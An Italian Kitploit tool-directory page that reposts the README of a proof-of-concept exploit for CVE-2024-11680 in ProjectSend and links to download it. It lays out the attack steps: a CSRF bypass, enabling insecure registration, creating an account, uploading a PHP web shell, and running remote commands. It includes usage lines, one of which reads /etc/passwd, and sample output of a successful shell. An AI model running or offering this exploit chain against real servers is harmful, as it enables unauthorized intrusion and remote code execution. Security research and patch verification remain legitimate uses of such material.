Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-11680 — Questo repository contiene un exploit proof-of-concept (PoC) per CVE-2024-11680, una vulnerabilità critica in ProjectSend r1605 e versioni precedenti. L'exploit è mirato a un'autenticazione errata a causa di problemi con impostazioni dei privilegi errate e injection di comandi. | Kitploit
Strumenti/GitHubGitHub/qucklecrabik/cve-2024-11680
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubqucklecrabik/cve-2024-11680

CVE-2024-11680

Questo repository contiene un exploit proof-of-concept (PoC) per CVE-2024-11680, una vulnerabilità critica in ProjectSend r1605 e versioni precedenti. L'exploit è mirato a un'autenticazione errata a causa di problemi con impostazioni dei privilegi errate e injection di comandi.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
5 mesi faNon ancora revisionato
Condividi

Exploit ProjectSend CVE-2024-11680

Questo è un exploit proof-of-concept per CVE-2024-11680, una vulnerabilità di modifica della configurazione non autenticata e upload di web shell in ProjectSend.

Descrizione

L'exploit sfrutta molteplici vulnerabilità in ProjectSend:

  • Bypass del token CSRF che consente modifiche alla configurazione
  • Impostazioni di registrazione client non sicure
  • Upload di file senza restrizioni che porta all'esecuzione di codice remoto

Requisiti

  • Python 3.x
  • Pacchetti Python richiesti:
    root@kitploit:~
    pip install requests colorama
    

Utilizzo

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

Argomenti

  • -u, --url: URL di destinazione (es., )
http://target.com/projectsend
  • -c, --command: Comando da eseguire sul target (default: id)
  • Esempi

    root@kitploit:~
    # Get Python version
    python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
    
    # List directory contents
    python3 exploit.py -u http://target.com/projectsend -c "ls -la"
    
    # Get system information
    python3 exploit.py -u http://target.com/projectsend -c "uname -a"
    
    # Read passwd file
    python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
    

    Come funziona

    1. Ricognizione: Recupera il token CSRF e verifica la vulnerabilità del target
    2. Manipolazione della configurazione: Abilita opzioni di registrazione client non sicure
    3. Registrazione utente: Crea un nuovo account client con approvazione automatica
    4. Caricamento file: Carica una web shell PHP con estensione .phtml
    5. Esecuzione comandi: Esegue i comandi specificati tramite la shell caricata

    Caratteristiche

    • Estrazione automatica del token CSRF
    • Generazione casuale delle credenziali utente
    • Denominazione intelligente dei file e rilevamento timestamp
    • Output colorato per una migliore visibilità
    • Capacità di esecuzione comandi integrata

    Avviso legale

    Questo strumento è solo per scopi educativi. Usalo responsabilmente e solo su sistemi per i quali hai esplicita autorizzazione al test.

    Riferimenti

    • CVE-2024-11680

    Output di esempio

    root@kitploit:~
    [+] Target is vulnerable
    [+] Insecure options enabled
    [+] User registered successfully.
    [+] New username: NoDLQWYF
    [+] New password: X02A3g9LuN4S
    [+] File uploaded: kLoISqdA.phtml
    [+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
    [+] Command Output:
    Python 3.9.2
    
    Scarica lo strumento